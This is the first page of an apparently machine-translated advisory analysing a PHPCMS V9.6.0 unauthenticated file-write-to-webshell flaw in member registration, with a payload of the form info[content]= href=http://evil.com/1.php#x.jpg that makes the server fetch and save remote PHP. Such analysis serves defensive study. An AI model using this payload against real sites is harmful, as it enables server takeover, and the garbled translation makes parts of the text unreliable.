Phpcms V9. 6. 0 any file write getshell vulnerability analysis-vulnerability warning-the black bar safety net

2017-04-13T00:00:00
ID MYHACK58:62201785219
Type myhack58
Reporter 佚名
Modified 2017-04-13T00:00:00

Description

1 Introduction:

It is said to be one in the underground has been around for half a 0day, which has recently been broke to, in the membership registration page, that this vulnerability without the need to login you can use, or more powerful.

2 vulnerability analysis:

Follow up on the registration page before you look at the default installation finished phpcmsv9 about member registration settings in member_setting. cache. php file, the content is as follows:

!

Into the topic, see the registration page code: phpcms\modules\member\index.php

The entry point in the function register:

!

This part of logic may control the above member registration settings file in the switch to Quick skip, fast-forward to the first 130 rows:

!

Where in the last line$user_model_info is submitted by the user info variables or arrays obtained after treatment, track down the$user_model_info process, in caches\caches_model\caches_data\member_input. class. php file get method:

!

$this->fields in the constructor are defined, code is read a cache file content:

!

The variable$modelid in phpcms\modules\member\index. php defined, the direct can be through POST submission

!

The variable$modelid control, assigned a value of 1 will from model_field_1. cache. the php file reads the cache configuration, follow model_field_1. cache. php file, the first 262 rows are defined

!

Back to the get method inside of the$value = $this->$func($field, $value)replaced by a wording that is,$value = editor($field, $value), where$field and$value can be controlled, for the POST info array of key and value.

Then follow the editor method:

!

Continue to follow the key of the penultimate line of the attachment class of the download methods note that here the first argument$field is the POST method info array the key has been written to death for content, so submit the payload to be shaped such as info[content]=xxxx in the phpcms\libs\classes\attachment. class. php file:

!

The figure in the penultimate line of the regular roughly means: if the url is not in gif|jpg|jpeg|bmp|png these pictures of suffix endings that just returns the original url, exit, walk less than vulnerability trigger point. (This regular take OF is the 3 the parentheses is matched to the value, such as submission of info[content]= href=http:// evil.com/1.jpg, the matching result is: <http://evil.com/1.jpg)> to.

Then manufacturers went to fillurl method to the url fill full:

!

It is in this place is out of the question, follow up fillurl method:

!

Note that the first 300 lines: understand the php code can be found in the above the#of judgment, when the user submits the url contains a#, then just take the#in front of as url.

Omitted the subsequent part of the code, to achieve the function of opening the above url in the http:// the filter is empty, and will be more/replaced with a single/, The final return url with http://. Such as user submitted info[content]= href=http://evil.com/1.php#x.jpg then after fillurl after processing the returned result is http://evil.com/1.php that is not a problem?:) )

Back to the top is not complete analysis of the download method, the follow-up to take the file suffix of this step fileext: the

!

!

Found taken is the last point after the content as a name suffix, a combination of the above analysis can be learned, this time into the logic of the variable$file 为 http://evil.com/1.php, thus obtaining the file suffix will become php.

Continue to look at the download method, the code flow to the 171 line:

!

[1] [2] next